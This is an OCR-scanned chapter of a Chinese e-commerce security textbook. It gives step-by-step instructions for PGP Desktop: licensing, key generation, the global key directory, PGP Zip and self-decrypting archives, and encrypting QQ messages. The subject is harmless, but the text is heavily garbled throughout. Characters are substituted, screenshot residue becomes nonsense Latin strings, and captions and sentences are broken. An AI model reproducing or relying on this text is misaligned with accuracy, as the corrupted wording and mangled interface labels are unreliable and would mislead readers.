辆 入 悠 购买 后 接收 到 的 许可 证 或 在 下 面 更 新 。 加 果 悠 没有 一 个 许可 证 号 ， 悠 可 
蕊 现在 购买 ,请求 一 个 一 次 性 评估 或 直接 使 用 产品 但 禁用 多 数 功能 。 Eai 
选择 此 选项 在 今后 输入 一 个 许可 证 号 。 


MAG aE 

| -| -| -| 
C 请 家 一 个 PP pedtop 一 次 性 30 天 评估 
立即 一 个 购买 可 证 


个 不 使 用 许可 证 并 禁用 多 数 功 能 


mm | wm | 


图 6.10 输入 许可 证 号 码 


车 没有 购买 该 产品 ,可 选中 “请 求 一 个 PGP Desktop 一 次 性 30 天 评估 ” 单 选 按钮 ,然后 
hf 击 “ 下 一 步 ” 按 钮 ， pi H 30 天 评估 序列 号 申请 请 求 ,并 提示 用 户 在 收 到 评估 序列 号 之 后 ,再 


À 
4 


化 续 该 配置 安装 。 
对 于 已 购买 该 产品 并 获得 许可 证 号 码 的 用 户 , 可 在 如 图 6. 10 所 示 的 界面 中 输入 许可 证 
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号 码 , 在 保证 网 络 连接 正常 的 情况 下 再 单 击 “ 下 一 步 ” 按 钮 , 接 下 来 安装 程序 将 连接 PGP 
的 授权 服务 器 ,对 产品 许可 证 进行 校 验 并 激活 该 产品 的 使 用 授权 。 授 权 成 功 后 的 界面 如 


图 6.11 所 示 。 
posame OOOO 


许可 
saam 
WERN: 全 业 完全 版 
许可 证 席位 : 不 限 
许可 证 到 期 : 永 不 
厂 产品 信息 
| 2) B 
S, © “o KC) o 
PGP PGP PGP 
RARE 消息 Esa sneme 2eme 


鼠标 移动 到 图 标 上 学 习 关于 PGP Desktop 的 每 个 功能 


[Ca ww | Ww | 


图 6.11 PGP 授权 成 功 后 的 界面 
授权 成 功 后 , 单 击 * 下 一 步 按 钮 ,进入 新 建 用 户 或 导入 以 前 用 户 的 密 钥 配置 
面 如 图 6. 12 所 示 。 


HUD F4S8DDIEBOSPGPsTYDti (LEEY. 
mert. 
| 


C 我 先前 使 用 过 PGP 并 且 我 已 经 有 守 钥 (E)。 


oomo wn | Ww | 


图 6.12 选择 用 户 类 型 


阶段 ,其 界 


选中 “我 是 一 个 新 用 户 ” 单 选 按 钮 .然后 单 击 " 下 一 步 ” 按 钮 。 接 下 来 PGP 会 在 系统 中 搜 
索 是 否 有 可 作为 PGP 密 钥 使 用 的 数字 证 书 .车 有 , 则 会 显示 如 图 6.13 所 示 的 对 话 框 。 若 不 


想 使 用 这 些 数字 证 书 , 则 单 击 跳 过 ”按钮 .不 导入 这 些 搜索 到 的 数字 证 书 。 
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PGP 设置 助手 4 
个 人 证 书 导 入 
sr saa te 
65 n 3pcp: 


w" RARO ARERR ENCE , 


加 果 修正 在 从 
Desktop 消 息 服务 ,您 可 以 这 么 
顽 应 该 导入 这 些 证 书 。 


加 果 您 不 是 很 肯定 想 要 立刻 导入 j shpa, 您 以 后 可 以 通过 在 PGP 
Desktopi iE FA TAER REMERA At, 
wr 


‘+t-sw E _ ww | 


帮助 


图 6.13 选择 是 否 导入 在 系统 中 搜索 到 的 数字 证 书 


下 面 使 用 新 创建 的 密 钥 来 作为 PGP 加 解密 使 用 ,因此 , 单 击 “ 跳 过 "按钮 ,进入 PGP 密 


钥 生 成 助手 界面 ,如 图 6. 14 所 示 。 


PGP 密 钥 生 成 助手 


加 果 效 使 用 一 个 硬件 令 牌 请 现在 插入 它 。 修 的 令 牌 信息 将 在 下 面 显 示 。 


此 助手 格 帮 助 你 生成 一 个 新 PGP 密 角 ， 一 个 密 钥 需要 每 个 参与 者 有 一 个 安全 邮 
PT. SBAENEG LERENA, BERDEEN. 


PRESNE ENEA OA ， 请 选择 PGP Desktop 的 帮助 菜 


图 6.14 PGP 密 钥 生 成 助手 


—w | ww | 


在 如 图 6.14 所 示 的 界面 中 h° F — 2748 BE À 9 83 E pü 2 Pt Br Ez. n 8] 6. 15 所 
示 。 在 该 对 话 框 中 ,可 设置 所 要 生成 的 密 钥 对 所 关联 的 使 用 者 信息 。 单 击 * 更 多 ”按钮 ,可 以 
设置 更 多 的 邮件 地 址 。 单 击 “ 高 级 "按钮 ,还 可 进一步 对 所 要 生成 的 密 钥 的 类 型 .大 小 和 算法 


进行 详细 设置 ,如 图 6. 16 所 示 。 


在 如 图 6. 15 所 示 的 界面 中 输入 用 户 的 全 名 和 主要 邮件 地 址 ,然后 单 击 “ 下 一 步 " 按 钮 ， 
进入 对 私 钥 保 护 口 令 的 设置 界面 .如 图 6. 17 所 示 。 在 该 界面 中 输入 保护 口令 并 注意 牢记 ， 
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Z= ss 
分 配 名 称 和 邮件 


者 一 个 意 角 对 都 有 一 个 与 其 关联 的 名 称 。 名 称 和 邮件 地 址 让 您 的 通 偿 人 知道 地 
MEERA ARTE. 


2840: 


主要 邮件 (E) : 更 多 (M)> 


点 击 "高 级 "获得 更 多 密 钥 设置 . 


BAV. 


《上 一 步 @) [下 一步 中 取消 | a» | 


图 6.15 密 钥 生成 设置 


xi 
TULED: S | 


签名 密 钥 大 小 (3) : [eos 1024-4096 
MESHA: foss 1024 - 4096 
IYD: C 永 不 WW c fomm: 


-算法 = 
允许 的 : [Z AES M CASI ÍV Triplepes V pea Í Twofish 


首选 (@): faes xj 


允许 的 ; F SHA-2-256 Í SHA-2-384 [Ç SHA-2.512 
F RIPEMD-160 — Í SHA-L 


WR: [sHa-2-256 了 = 


Hir: M ep2 Mae Vw F 无 W 


首选 (E) : ”| 不 压缩 zi 


图 6.16 高 级 密 钥 设置 


然后 单 击 “ 下 一 步 按 钮 继续 。 接 下 来 安装 程序 将 开始 生成 密 钥 对 ,如 图 6. 18 所 示 。 

在 如 图 6.18 所 示 的 界面 中 , 单 击 “下 一 步 ? 按 钮 ,将 新 生成 的 密 钥 对 添加 到 密 钥 环 中 并 
继续 。 添 加 成 功 后 , 接 下 来 进入 PGP 全 球 名 录 助 手 配 置 阶段 ,如 图 6. 19 所 示 。 

PGP 全 球 名 录 助 手 可 以 帮 用 户 将 邮件 地 址 和 对 应 的 公 钥 添加 到 全 球 名 录 中 ,以 对 用 户 
身份 的 真实 性 提供 担保 ,并 允许 其 他 人 利用 该 公 钥 来 验证 用 户 的 数字 签名 ,或 者 用 该 公 钥 来 
加 密 消 息 ,以 便 向 用 户 发 送 加 密 消息 。 
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PGP 设置 助手 
创建 口令 
修 的 肥 钥 格 受 口令 保护 。 保 持 你 口令 的 机 守 性 ,不 把 好 写 下 来 是 很 重要 的 。 


娩 的 口令 至 少 应 该 有 8 位 字符 长 度 ， 并 包含 数字 和 字母 。 


sanw: 显示 键入 (d 厂 


重 输 入 口令 : 


口令 强度 : 0% 


<-s -sw mw | ww | 


图 6.1 


PGP 设置 助手 


7 创建 私 钥 保 护 口令 


图 


密 钥 生成 进度 
UTRED R RELA PA NEEE. 


您 成 功 的 生成 了 一 个 区 许 您 接收 安全 消息 和 签名 文档 的 PGF 密 钥 对 , 
点 击 " 下 一 步 ' 汪 加 您 的 新 密 铀 对 到 | 个 的 客 钥 环 并 继续 。 


i] wn | Ww | 


6.18 生成 密 钥 对 


向 PGP 全 球 助 手提 交 邮 件 地 址 与 公 钥 信息 后 ,将 收 到 一 封 来 自 PGP 的 邮件 ,以 核对 用 
户 邮件 地 址 的 真实 性 和 校 验 用 户 的 身份 。 邮 件 主 题 为 "LPGP Global Directory ] Verify 
Your Key”。 邮 件 内 容 大 意 是 为 了 检验 公 钥 与 邮件 地 址 的 真实 性 ,要 求 用 户 单 击 邮件 中 提 
供 的 一 个 链接 地 址 ,以 完成 校 验 过 程 。 如 果 用 户 没有 提交 过 或 者 不 想 将 该 公 钥 添加 到 PGP 


全 球 名 录 中 ,用 户 


D| 


钥 与 邮件 地 址 信息 ， 


以 删除 本 邮件 不 需 
而 不 会 将 其 添加 到 


要 做 其 他 操作 .14 天 后 ,系统 将 自动 删除 提交 来 的 公 
PGP 全 球 名 录 中 。 


在 如 图 6. 19 所 示 的 界面 中 , 单 击 "下 一 步 ? 按 钮 ,将 生成 的 公 钥 添 加 到 全 球 名 录 中 ,如 


图 6.20 所 示 。 若 


PERR 


h BE IRH. 
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PGP 全 球 名 录 助 手 


PGP 全 球 名 录 校 验 , 存 鱼 ,并 分 发 公 胃 。 通 过 校 验 与 邮件 地 址 对 应 的 密 角 , 全 
球 目录 提供 担保 此 密 角 是 由 此 邮件 地 址 所 拥有 的 密 角 。 这 格 允 许 其 她 人 验证 来 
自 这 个 密 铀 的 签名 并 以 它 加 侈 消息 。 


这 个 助手 格 帮 助 你 发布 您 的 公 钥 到 PGP 全 球 名 录 。 


加 果 您 不 是 很 确定 想 要 提交 你 的 密 钥 到 此 全 球 名 录 ， 悠 可 以 在 今后 任何 时 候选 
挥发 布 到 全 球 名 录 荣 单项 。 


图 6.19 PGP 全 球 名 录 助 手 


PGP 设置 助手 3 
进度 


此 发 布 进程 包括 更 新 您 的 密 钥 并 格 其 提交 至 全 球 名 录 服 务 器 - 


— em [FZ22] | Ww | 
图 6. 20 将 公 钥 添加 到 全 球 名 录 中 


提交 到 PGP 全 球 名 录 中 的 密 钥 可 以 通过 访问 http://keyserver. pgp. com 网 站 来 移 
除 , 输 入 用 户 的 邮件 地 址 并 且 根据 提示 操作 即 可 。 若 用 户 不 想 再 接收 任何 加 密 的 邮件 ,建议 
从 PGP 全 球 名 录 中 移 除 自己 的 公 钥 。 

在 如 图 6. 20 所 示 的 界面 中 单 击 “ 下 一 步 ” 按 钮 ,将 显示 有 关 PGP 消息 的 简介 对 话 框 , 如 
图 6.21 所 示 。 

在 如 图 6.21 所 示 的 界面 中 , 单 击 * 下 一 步 ? 按 钮 :进入 对 邮件 加 密 策 略 的 配置 界面 ,如 
图 6.22 所 示 。 

在 如 图 6. 22 所 示 的 界面 中 , 单 击 “ 下 一 步 " 按 钮 ,完成 PGP 设置 助手 的 配置 操作 , 如 


162 


第 6 章 电子 商务 的 安全 | 


PGP 消 息 : 介绍 


PGP Desktop 将 与 修 的 消息 无 颖 整合 。PGP 自 动 探索 并 配置 自身 以 保护 绒 大 多 数 
上 pe 由 PGF 的 代理 访问 5MTP ，POP , IMAP ，Exchange 服 务 器 
和 Lotus Notes. 


PGP 也 在 您 也 其 地 PGP 用 户 交 流 时 加 密 AOLB Instant Messenger" BINAS. 


F BERS 
E 自动 加 密 AOLB Instant Messenger™ 通信 


omn wm | am | 


图 6.21 关于 PGP 消息 介绍 


pGP 消 息 : 默认 发 信 邮 件 策略 
当 决 定 如 何 安全 发 送 邮件 时 ，PGP 点 面 默认 将 应 用 下 列 第 略 。 您 可 以 根据 情况 
定制 这 些 第 略 。 


RENE: re O 


把 所 有 消息 加 密 并 且 等 各 为 机 迹 ， 可 梅 TPGPJ 置 于 消息 主题 的 开头 ， 或 在 邮件 客 . 
SA EPNER). 二 


查找 已 经 个 企 您 密 钥 环 中 的 密 钥 。 加 果 设 有 找到 标记 为 机 密 的 稍 息 所 对 | 

铀 ， 宵 息 不 能 被 发 送 。 

-ame Ce 
无 沦 何 时 通过 PGP 全 球 名 录 寻 找 接收 人 密 钥 并 用 已 到 所 有 接收 入， 应 
AAE Aa S SIYR0IRIIWI8- 加 果 不 i 完 钥 ,消息 会 不 加 密 并 


《上 一 步 四 | 下 - 步 加 >| ma | “m | 
图 6.22 PGP 消息 对 邮件 加 密 的 策略 


图 6.23 所 示 。 
配置 完成 后 ,在 Windows“ F thA” X Ap iE) PGP 群 组 ,然后 选择 PGP Desktop 3 3 
项 ,启动 PGP Desktop 软件 ,其 主 界面 如 图 6. 24 所 示 。 
生成 的 密 钥 对 默认 保存 在 C:\Documents and Settings\ Administrator \ My Documents\ 
PGP 文件 夹 中 ,如 图 6.25 所 示 , 注 意 复制 备份 。 由 于 私 钥 也 是 以 文件 形式 保存 在 硬盘 
的 ,因此 ,设置 的 私 钥 保 护 口令 一 定 要 强壮 。 文 件 主 名 末尾 带 有 *“-bak” 的 文件 是 密 钥 的 备份 
文件 ; 


= 


H 
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通过 拖 放 项 目 到 | 您 点 面 上 pcp 粉 硫 器 图 标的 位 置 即 可 皖 除 敏感 文件 


Ey 


配置 完成 


Ë PGP Desktop - 全 部 密 钥 


E C} cqsniper 
I A, PGP Gobal Directory Verification Key 


book@cadd.cq.cn 


图 6.24 PGP 主 界面 


slaid 
XO RBO FEV BAA IAD EWY t | 
QAE- O- T| m 一 文人 天 |ò > XI9| E 

HAHH) |@ C:\Documents and SettingstAadministrator|My DocumertsIPGP == BE] 
Zi- 大 小 [并 型 KEEN [m 

S} pubring.pkr SKB PGP 公 钥 环 2010-11-12 11:04 A 

Š] pubring-bak.pkr SKB PGP2AWBF 2010-11-1211:24 A 

$) secring.skr 3KB PEPES 2010-11-12 11:04 A 

T secring-bak.skr 3KB PRISTE 2010-11-12 11:24 A 


生成 的 密 钥 对 
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6.3.3 使 用 PGP 加 解密 数据 


1. PGP 密 钥 管理 

PGP 主 界面 左 侧 工具 栏 中 的 PGP 密 钥 主 要 用 于 查看 .搜索 .删除 .废除 .复制 公 铀 和 导 
出 用 户 密 钥 等 的 维护 和 管理 。 

在 右 侧 的 密 钥 列表 中 右 击 ,在 弹出 的 菜单 中 提供 了 相关 功能 项 ,如 图 6. 26 所 示 。 


图 6.26 PGP 密 钥 管理 


选择 菜单 中 的 “导出 ?选项 ,可 将 用 户 的 公 钥 导出 到 一 个 扩展 名 为 . asc( ASCII 密 钥 文 
件 ) 的 文件 中 ,该 文件 可 用 记事 本 打开 ,里 面 存储 的 是 用 户 的 公 钥 。 导 出 的 公 钥 文件 可 利用 
“文件 ” 主 菜 单项 下 面 的 * 导 入 ”功能 ,导入 到 密 钥 环 中 ,这 样 就 可 实现 用 户 间 公 钥 的 相互 
交换 。 

若 要 新 建 PGP 密 钥 对 ,需要 从 "文件 " 主 菜 单 中 选择 “新 建 PGP 密 钥 ”选项 ,打开 PGP 
密 钥 生成 助手 ,以 完成 PGP 密 钥 对 的 创建 。 

为 便于 后 续 的 PGP 加 密 和 解密 测试 ,利用 “新 建 PGP 密 钥 ” 功 能 项 再 创建 一 个 名 为 
smartboy 的 用 户 的 密 钥 对 。 创 建 过 程 略 。 

2. PGP 压缩 包 

若 要 对 单个 或 多 个 文件 进行 加 密 或 解密 ,可 通过 创建 或 打开 PGP 压缩 包 功 能 来 实现 。 
TE PGP 左 侧 的 工具 栏 中 , 单 击 *PGP 压缩 包 ” 按 钮 ,将 展开 子 功能 项 ,如 图 6. 27 所 示 。 

(1) 创建 PGP 压缩 包 

若 要 对 存储 有 重要 内 容 或 敏感 资料 的 文件 进行 加 密 保 存 , 或 加 密 后 传送 给 接收 方 , 则 可 
通过 创建 PGP 压缩 包 文件 来 实现 。 

单 击 “ 新 建 PGP 压缩 包 ” 按 钮 ,将 打开 PGP 压缩 包 助 手 , 如 图 6. 28 所 示 。 

将 要 加 密 的 文件 或 文件 夹 拖 放 到 待 加 密 文件 列表 框 中 ,或 通过 文件 列表 框 底部 的 功能 
按钮 浏览 添加 文件 或 文件 夹 。 文 件 加 密 后 ,车 不 需要 再 保留 原始 文件 ,可 勾 选 “粉碎 原件 ” 选 
项 ,加 密 文件 生成 后 ,PGP 将 彻底 安全 地 删除 原件 。 


165 


Jann = 2 


图 6.27 PGP 压缩 包 功 能 项 


.新 建 PGP 压 缩 包 

这 个 助手 椅 会 帮助 您 保 护 文件 和 文件 夷 以 用 于 存 圣 或 转移 。 拖 放 修 的 文件 到 此 方 框 

i, RERO Fe 26 E. 

£S l 大 小 | =s jz 

piona Nitad 

ri É B 粉碎 原件 厂 
aeoo _ mn | 


图 6.28 新 建 PGP 压缩 包 


待 加 密 文件 选择 好 后 , 单 击 “ 下 一 步 ”按钮 ,此 时 将 显示 如 图 6. 29 所 示 的 加 密 方式 设置 
对 话 框 。 

在 如 图 6. 29 所 示 的 对 话 框 中 ,口令 "加密 方式 为 普通 加 密 方 式 , 用 输入 的 口令 作为 密 
钥 , 对 内 容 进 行 对 称 加 密 。 解 密 者 必须 知道 该 加 密 口 令 ,并 安装 有 PGP 软件 才能 正常 解密 。 

“PGP 自 解密 文档 ”用 于 创建 生成 一 个 自 解密 的 PGP 压缩 包 文件 ,其 优点 在 于 接收 方 
(解密 者 ) 不 需要 安装 PGP 软件 ,输入 自己 的 私 钥 保 护 密 码 即 可 正常 解压 解密 。 

“只 签名 ”选项 只 是 创建 一 个 PGP 签名 文件 ,并 不 会 对 文件 进行 加 密 处 理 。 接 收 方 通 
过 校 验 签 名 来 判断 文件 是 否 是 该 用 户 所 签发 的 。 
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RZ FUE 


wë 


选择 烙 想 要 怎样 为 修 的 收 件 人 人 加密。 如 果 效 对 特殊 选项 沉 福 没有 把 握 ， 点 击 查 看 下 面 


C RFAES 
要 有 所 有 收 件 人 的 密 钥 ( 景 安全 ) 


c ne 
委 没 有 所 有 收 件 人 的 密 角 ,但 地 们 都 使 用 PGP Desktop 
C PGP 自 解密 文 着 
不 使 用 PGP Desktop 收 件 人 
个 只 签名 
创 肝 一 个 PGP 签名 文件 (不 加 密 ) 


加 果 效 有 所 有 收 件 人 的 密 钥 (在 您 的 PGP Desktop 密 钥 环 ,一 个 密 钥 服务 器 ,或 PGP 
全 球 名 录 ) 可 使 用 这 个 选项 。 如 果 这 个 被 加 密 的 文件 是 为 了 您 自己 ， 您 少 须 使 用 PGP 

。 如 果 您 没有 ， 点 击 取 硝 停止 这 个 PGP 庄 缩 包 助手 ， 然 后 选择 
文件 -> 新 建 Pep 窗 角 。 


< k—-so [F==w j mw | ww | 


图 6.29 ”选择 加 密 方 式 

“ 收 件 人 密 钥 "采用 收 件 人 的 公 钥 对 文件 内 容 进行 公 钥 加 密 。 此 处 选中 “ 收 件 人 密 钥 " 单 

选 按 钮 ,然后 单 击 “ 下 一 步 "按钮 , 接 下 来 将 显示 “添加 用 户 密 钥 ”对 话 框 ,如 图 6.30 所 示 。 单 
击 “ 添 加 ”按钮 ,可 显示 “ 收 件 人 选择 "对话 框 ,如 图 6.31 所 示 .。 


添加 用 户 密 铀 
为 娩 想 要 加 灾 的 收 件 人 和 输入 用 尸 灾 外 
3—TEWAA RIP ARA HI 

A. cqsniper <bookBxcqdd,cq, on> SB. 


st- w| F—* 0 > 职 消 k] 


图 6.30 “添加 用 户 密 钥 "对话 框 


选择 收 件 人 实际 上 是 选择 收 件 人 的 公 钥 。 在 如 图 6. 31 所 示 的 对 话 框 中 ,在 “ 密 钥 来 源 ” 
列表 框 中 选择 收 件 人 (smartboy) ,然后 单 击 “ 添 加 ”按钮 ,将 其 添加 到 “ 密 钥 添加 ”列表 框 中 ， 
最 后 单 击 “ 确 定 ” 按 钮 ,关闭 “ 收 件 人 选择 ”对 话 框 。 

经 过 以 上 操作 后 ,在 如 图 6. 30 所 示 的 用 户 密 钥 候选 列表 框 中 ,就 会 添加 smartboy 用 户 
的 密 钥 。 然 后 单 击 " 下 一 步 ” 按 钮 ,此 时 将 显示 “签名 并 保存 ”对 话 框 ,如 图 6. 32 所 示 。 
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图 6.31 “ 收 件 人 选择 "对 话 框 


签名 并 保存 

Eeteycesmestirigoyait Aiakas. €T eius SRE 
zama 
cqsniper <book@pcqdd.cq.cn> 了 
ne: 


显示 律 入 厂 


wn | =] 
图 6. 32 “签名 并 保存 "对话 框 


在 如 图 6. 32 所 示 的 对 话 框 中 ,可 选择 数据 发 送 方 签名 的 密 钥 ( 私 钥 ), 设 置 最 后 生成 的 
PGP 加 密 压 缩 包 的 存放 位 置 和 文件 名 ,默认 为 C:\Documents and Settings\Administrator\ 
My Documents\ ,然后 输入 发 送 方 私 钥 的 保护 口令 ,最 后 单 击 “下 一 步 ? 按 钮 , 即 开始 加 密 和 
打包 文件 ,完成 后 将 显示 如 图 6. 33 所 示 的 对 话 框 。 

从 图 6. 33 中 可 见 ,数据 接 收 方 的 公 钥 有 两 个 , 即 发 送 方 的 公 钥 和 数据 接收 方 的 公 
这 样 生 成 的 PGP 压缩 包 文件 ,对 于 数据 接收 方 和 原 数据 发 送 方 都 可 以 使 用 各 自 的 私 钥 保护 
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密码 ,解密 还 原 出 PGP 压缩 包 文 件 中 的 内 容 。 如 果 要 求生 成 的 PGP 压缩 包 只 有 数据 接收 
方才 能 解密 还 原 出 数据 ,数据 发 送 方 自己 也 不 能 解密 还 原 出 数据 , 则 只 需 在 如 图 6. 30 所 示 
的 对 话 框 中 将 发 送 方 自己 的 用 户 密 钥 从 列表 框 中 移出 ,只 添加 接收 方 的 用 户 密 钥 即 可 。 


第 包 
创建 PgP 压 连 包 校园 网 妃 置 及 P 分 妃 ( 最 新 整理 版 ),.pgp 
= gi AMPER 
“V casnper <bookgcqdd.cq.n>- 
smartboy <answer@cqdd.cq.cn> 
日 2 等 名 
h 用 密 钥 答 名 cqsniper <bookBcqdd,cqcn> 
日 己 文件 & 文 件 到 


3.pg 
到 | 校园 网 也 置 及 IP 分 本 (最 新 整理 版 ).doc 


<o [ zw ] ww jJ ww | 


图 6.33 PGP 压缩 包 创 建成 功 


(2) 解密 打开 PGP 压缩 包 
若 要 解密 还 原 出 PGP 压缩 包 中 的 文件 , 则 在 如 图 6. 27 所 示 的 界面 中 单 击 “打开 一 个 
PGP 压缩 包 ” 按 钮 ,此 时 将 弹出 文件 打开 对 话 框 ,在 该 对 话 框 中 选择 要 打开 的 PGP 压缩 包 
文件 后 ,将 弹出 如 图 6. 34 所 示 的 对 话 框 ,要 求 Ki 
输入 接收 方 私 钥 的 保护 密码 ,和 输入 完毕 后 , 单 击 wmgurnanmmm: 
“确定 ”按钮 ,PGP 将 开始 解密 还 原 PGP 压缩 包 featber Caseteaaatse ay gsNaotg) 
中 的 数据 ,解密 还 原 成 功 后 的 界面 如 图 6. 35 
所 示 。 显示 键入 (W) 厂 
PGP 压缩 包 解密 还 原 出 的 文件 显示 在 如 。 fe 
图 6.35 所 示 的 文件 列表 框 中 ,在 该 文件 列表 框 
的 快捷 菜单 中 ,提供 了 对 压缩 包 的 管理 功能 . 比 mio 
如 提取 文件 .向 压缩 包 添 加 文件 或 新 建文 件 夹 、 
删除 压缩 包 中 的 文件 等 。 图 6.34 输入 接收 者 的 私 钥 保 护 口令 
若 要 将 PGP 压缩 包 中 的 文件 提取 出 来 . 另 
存 为 已 解密 的 普通 文件 , 则 在 文件 列表 框 中 右 击 要 提取 的 文件 ,在 弹出 的 快捷 菜单 中 选择 
“提取 ”菜单 项 ,之 后 将 打开 “浏览 文件 夹 ” 对 话 框 ,在 该 对 话 框 中 选择 保存 文件 的 文件 夹 , 然 
后 单 击 “确定 "按钮 ,被 选中 的 文件 就 会 提取 释放 到 指定 的 文件 夹 中 。 若 要 全 部 提取 出 来 , 则 
只 需 全 部 选中 ,然后 再 选择 “提取 ”菜单 项 即 可 。 
车 要 向 已 生成 的 PGP 压缩 包 中 添加 文件 或 文件 夹 , 则 在 文件 列表 框 中 的 任意 位 置 右 
击 , 在 弹出 的 快捷 菜单 中 选择 “添加 文件 ”或 “新 建文 件 夹 ” 选 项 即 可 。 向 压缩 包 添加 新 文件 
之 后 ,出 现 的 界面 如 图 6. 36 所 示 。 
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C:\Documents and Settings\Administrator\My Documents 
186 K8 

已 解密 与 已 校 验 

cqsnipar <book@cqdd.cq.cn>, 0x85E6E92A, INA HE 


f 3jm 56.6KE ACDSee Pro 2.0 PEG ËJ 
8) 校园 网 了 和 置 及 pp 分 也 (最 新 整 理 版 ) doc 126 KB Microsoft Word SC 


图 6.35 PGP 压缩 包 解密 还 原 成 功 
校园 同 配置 及 IP 分 配 ( 最 新 整理 版 ) 
) ”查看 W) IRM Fe) # 


[2] RAAR: 分 配 ( 量 新 整理 版 ) 


mom em EA EC 


EES i i casniper <book@cadd.cq.n> > | OI WW 13 


PGP EBE 


A 校园 网 也 置 及 IP 分 配 (最新 


a 
Ld 


S6.8KB ACDSee Pro 2.0 JPEG BMP 
8) CERERA REE). doc 126KB Microsoft Word 文档 
加 三 六 三 了 doc 24.0KB Microsoft Word 文档 


图 6.36 向 压缩 包 添 加 文件 


在 如 图 6. 36 所 示 的 界面 中 选择 新 添加 的 文件 允许 的 接收 人 。 此 处 为 便于 测试 ,在 收 件 
人 列表 框 中 只 保留 smartboy 用 户 ,删除 cqsniper 用 户 . 然 后 单 击 “ 保 存 ” 按 钮 ,此 时 将 弹出 
“另存 PGP 压缩 包 ” 对 话 框 ,在 该 对 话 框 中 选择 新 的 PGP 压缩 包 的 存盘 路 径 和 文件 名 , 单 击 
“确定 ”按钮 后 ,将 打开 “PGP 为 密 钥 输入 口令 ?对 话 框 , 要 求 输入 发 送 者 的 私 钥 口令 ,输入 后 
单 击 “ 确 定 ” 按 钮 ,之 后 PGP 软件 将 重新 加 密 并 保存 PGP 压缩 包 。 
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重新 打开 新 生成 的 PGP 压缩 包 文 件 时 ,会 >l 
弹出 要 求 输入 私 钥 口 令 的 对 话 框 ,此 时 只 能 输 AAE == 
入 接收 方 Csmartboy) 的 私 钥 保护 密码 ,输入 发 i 
送 方 的 私 钥 保 护 密码 就 会 提示 “ 重 输入 您 的 私 
钥 口 令 ”, 如 图 6. 37 所 示 。 — ss 
G) 创建 自 解密 PGP 文档 
单 击 “ 新 建 PGP 压缩 包 ? 按 钮 ,添加 要 加 密 
的 文档 ,然后 在 如 图 6. 29 所 示 的 加 密 方 式 选 择 mo | 
界面 中 选中 “PGP 自 解 密 文档 " 单 选 按 钮 ,将 打 
开 如 图 6. 38 所 示 的 设置 自 解密 文档 保护 口令 
的 对 话 框 。 


图 6.37 错误 提示 


显示 键入 厂 
取消 帮助 


图 6.38 设置 自 解密 文档 的 保护 口令 


输入 自 解密 文档 的 加 密 保 护 口令 , 单 击 * 下 一 步 "按钮 ,在 打开 的 “签名 并 保存 ”对话 框 中 
单 击 * 浏 览 ?按钮 ,选择 PGP 压缩 包 保 存 的 位 置 ,然后 单 击 * 下 一 步 ?按钮 , 即 可 完成 对 自 解密 
文档 的 创建 。 自 解密 文档 的 扩展 名 为 . exe, 只 要 知道 加 密 口 令 , 任 何人 都 可 解密 还 原 出 数 
据 , 并 且 不 需要 用 户 安装 PGP 软件 。 

自 解密 文档 采用 口令 加 密 的 方式 来 保护 文档 ,将 文档 传送 给 接收 者 ,接收 者 双击 运行 自 
解密 文档 ,此 时 将 打开 如 图 6. 39 所 示 的 口令 输入 对 话 框 。 

输入 自 解密 文档 的 口令 ,然后 单 击 “ 开 始 解密 数据 "按钮, 即 可 完成 数据 的 解密 还 原 。 

3. 加 密 与 解密 消息 

PGP 压缩 包 是 以 文件 为 单位 对 数据 信息 进行 加 密 或 解密 的 。 若 要 对 当前 窗口 或 剪贴 
板 中 的 数据 进行 加 密 或 解密 , 则 可 使 用 PGP 托盘 图 标的 上 弹 菜单 中 的 “当前 窗口 ”或 “剪贴 
板 ” 菜 单项 中 的 各 子 菜 单项 的 功能 来 实现 .如 图 6. 40 所 示 。 

下 面 以 加 密 QQ 发 送 的 消息 为 例 , 介 绍 对 窗口 消息 的 加 密 与 解密 方法 。 
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以 下 是 释放 数据 的 文件 来 路 径 ， 效 也 可 单 击 MEARE: 


外 Pues 


F BRRARUFE. RESRSET E TA PIS ,利于 保密] 


TAMMERK O | WN. 0 


opwiym rar omese sre na riante reserves. m 


图 6.39 输入 PGP 自 解密 文档 的 口令 图 6.40 PGP 托盘 菜单 项 


(1) 加 密 窗口 消息 
在 QQ 软件 中 ,向 某 个 好 友 发 送 即时 消息 ,打开 即时 消息 发 送 对 话 框 ,并 输入 要 发 送 的 
消息 ,如 * 好 心态 是 慢 慢 锻炼 出 来 的 !”, 注 意 保证 输入 焦点 停留 在 有 待 加 密 文本 的 输入 框 中 。 
然后 单 击 桌面 右 下 角 的 PGP 托盘 图 标 ,选择 * 当 前 窗口 ?下 面 的 “加 密 & 签名 ”菜单 项 。 此 
时 PGP 会 自动 选择 当前 窗口 中 的 文本 内 容 , 接 着 弹出 PGP 密 钥 选择 对 话 框 ,如 图 6.41 
所 示 。 
Ë PGP Desktop - WDR Te N Sl 


了 cqsniper <booképcqdd.cq.cn> 


Smartboy <answerghcqdd cq,cn> 


T SB) ese ] o | 
r wisa 


图 6.41 选择 接收 者 的 密 钥 ( 公 钥 ) 


在 如 图 6.41 所 示 的 上 下 两 个 列表 框 中 ,可 以 通过 拖 放 操作 从 一 个 列表 框 中 将 用 户 移动 
到 另 一 个 列表 框 中 。 

选择 好 接收 者 后 , 单 击 “ 确 定 ” 按 钮 , 接 下 来 将 弹出 输入 发 送 者 私 钥 保 护 口令 的 对 话 框 ， 
输入 完 口令 后 , 单 击 “ 确 定 ” 按 钮 ,PGP 就 开始 对 当前 窗口 中 刚 选中 的 文本 内 容 进 行 加 密 , 加 
密 后 的 结果 如 图 6.42 所 示 。 然 后 单 击 “ 发 送 " 按 钮 , 即 可 将 加 密 后 的 消息 发 送 给 QQ 好 友 。 
QQ 好 友 收 到 该 密 文 后 ,使 用 自己 的 私 钥 保 护 口令 和 私 钥 对 其 解密 , 即 可 还 原 出 原始 消息 内 
容 , 并 可 验证 发 送 者 的 签名 是 否 正确 。 
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O 对 方 高 开 ( 佐 碌 )， 可 能 无 法 立即 回复 
车 交 起 中 请 条 经 信 汇 款 、 中 奖 信息 ， 思 轻易 护 打 陌生 电话 。 


rikjluyYs onygyGjcl 4 
2 人 vantaruraagzsayasehmtiecreecasm 


slm 

TdqLepa4ZNb46GLTs (BS gufyhyvbXrOuXh3x3VT9ZLNvFs= 
=S 

—— m PGP NESSAGE-——— 


AONAR ND 同济 让 记录 ~ 


`v 点 此 


QQ 电脑 莹 家 : 全 面 保护 电脑 安全 关闭 四 Wo 7j 


图 6.42 对 QQ 消息 进行 加 密 


通过 这 种 加 密 方式 发 送 的 QQ 消息 非常 安全 ,不 用 担心 被 第 三 方 截取 和 泄密 ,是 目前 发 
